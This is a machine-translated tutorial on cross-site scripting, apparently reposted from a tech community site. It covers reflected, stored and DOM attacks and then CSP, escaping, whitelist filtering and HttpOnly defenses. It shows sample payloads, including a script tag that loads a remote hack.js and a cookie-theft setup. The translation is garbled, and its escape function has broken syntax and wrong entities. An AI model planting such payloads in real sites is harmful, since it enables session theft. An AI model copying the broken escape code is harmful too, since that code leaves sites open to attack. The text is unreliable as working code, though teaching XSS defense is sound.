XSS attack and defense means

XSS attack: Cross-site scripting attack

XSS (Cross Site Scripting), the most common security vulnerability, is an attack that involves running illegal non-native HTML tags and JavaScript scripts to vulnerable Web sites

XSS attack mode classification

Reflection: URL parameters are directly injected

A. The attacker induces the user to click on A malicious URL, which may look like this:

http://localhost:3000/?from=<script>alert(' I am a malicious attack script! ')</script>

B. The server receives the parameter and splices the malicious code into the USER’S HTML. The user’s browser executes the malicious code after receiving the parameter.
```
/ / ordinary
http://localhost:3000/? from=china
/ / alert to try
http://localhost:3000/? from=
/ / get a Cookie
http://localhost:3000/? from=
// Short domain forgery https://dwz.cn/
/ / fake cookie invasion of chrome document. Cookies = "kaikeba: sess = eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNT Y1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="
Copy the code
```
Storage: The storage is stored in the DB, and the script stored is executed at runtime for injection purposes

Scenario: An attacker writes a malicious script in a comment. When other users access the comment category, the malicious script will obtain the user’s information
```
/ / comment
<script>alert(1)</script>
// Cross-site script injectionI came <script SRC ="http://localhost:4000/hack.js"></script>
Copy the code
```
Dom: URL parameter injection

Dom attacks are similar to reflex attacks in that malicious scripts are written through urls, except that browsers accept parameters and parse them directly

XSS attack hazards

Get page data
Obtaining user Cookies
Hijack front-end logic
Stealing arbitrary data from websites
Steal the user’s data
Steal user secrets and login status
Cheat users

XSS defense means

X-XSS-Protection

HTTP X-XSS-protection response header is a feature of Internet Explorer, Chrome, and Safari that stops the browser from loading the page when a cross-site scripting attack (XSS) is detected. Configuration parameters: 0 – Disable XSS filtering. 1 – Enable XSS filtering (usually the default for browsers). When the browser detects an attack, it will remove the insecure part 1; Mode =block – Enable XSS filtering. After an attack is detected, the insecure part is not cleared, but the page is blocked. Report = (Chromium only) – Enable XSS filtering. If a cross-site scripting attack is detected, the browser clears the page and sends a violation report using the functionality of the CSP report-URI directive.
CSP content security policy

CSP Content Security Policy is an additional layer of security that allows users to help detect and mitigate certain types of attacks, including cross-site scripting (XSS) and data injection attacks. A CSP is essentially a white collar sheet where the developer explicitly tells the browser which external resources can be loaded and executed. We just need to configure the rules, how to intercept is implemented by the browser itself, this way can reduce XSS attacks.
```
// Only local resources are allowed to be loaded
Content-Security-Policy: default-src 'self' 
// Only HTTPS images can be loaded
Content-Security-Policy: img-src https:/ / *
// No source frames are allowed to be loaded
Content-Security-Policy: child-src 'none'
Copy the code
```
```
ctx.set('Content-Security-Policy'."default-src 'self'")
// External resources cannot be loaded
http://localhost:3000/? from=
Copy the code
```
Escape character

The blacklist

User input can never be trusted. The most common way to escape input and output is to escape quotes, Angle brackets, and slashes
```
function escape(str) { 
  str = str.replace(/&/g.'& ') 
  str = str.replace(/</g.'< ') 
  str = str.replace(/>/g.'> ') 
  str = str.replace(/"/g.'&quto; ') 
  str = str.replace(/'/g.'& # 39; ') 
  str = str.replace(/`/g.'the & # 96; ') 
  str = str.replace(/\//g.'/ ') 
  return str 
}
Copy the code
```
For rich text, it is obviously not possible to escape all characters in this way, as this would escape existing formats. In this case, you need to filter the tags by whitelist or blacklist. However, you are advised to filter the tags by whitelist because there are too many tags and tag attributes to be filtered.

White list
```
const xss = require('xss') 
let html = xss('XSS Demo
') 
// --> XSS Demo
< script> alert("xss"); < /script> console.log(html)
Copy the code
```
httpOnly Cookie

This is the most effective defense against XSS attacks that intercept user cookies. When web applications set cookies, their attribute is set to HttpOnly, so that the cookies of web pages can be avoided from being stolen by malicious javascript of clients, so as to protect user Cookie information
```
response.addHeader("Set-Cookie"."uid=112; Path=/; HttpOnly")
Copy the code
```

The relevant data

Front-end Security Series 1: How do I Prevent XSS attacks?

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

XSS attack and defense for front-end learning

XSS attack and defense means

XSS attack: Cross-site scripting attack

XSS attack mode classification

XSS attack hazards

XSS defense means

XSS Demo

XSS Demo

The relevant data

Front-end Security Series 1: How do I Prevent XSS attacks?

XSS attack and defense for front-end learning

XSS attack and defense means

XSS attack: Cross-site scripting attack

XSS attack mode classification

XSS attack hazards

XSS defense means

XSS Demo

XSS Demo

The relevant data

Front-end Security Series 1: How do I Prevent XSS attacks?

Related Posts

The first Vue commit originally looked like this

Flutter environment configuration

Spring Boot + Log4j2 Log Framework Configuration (Maven)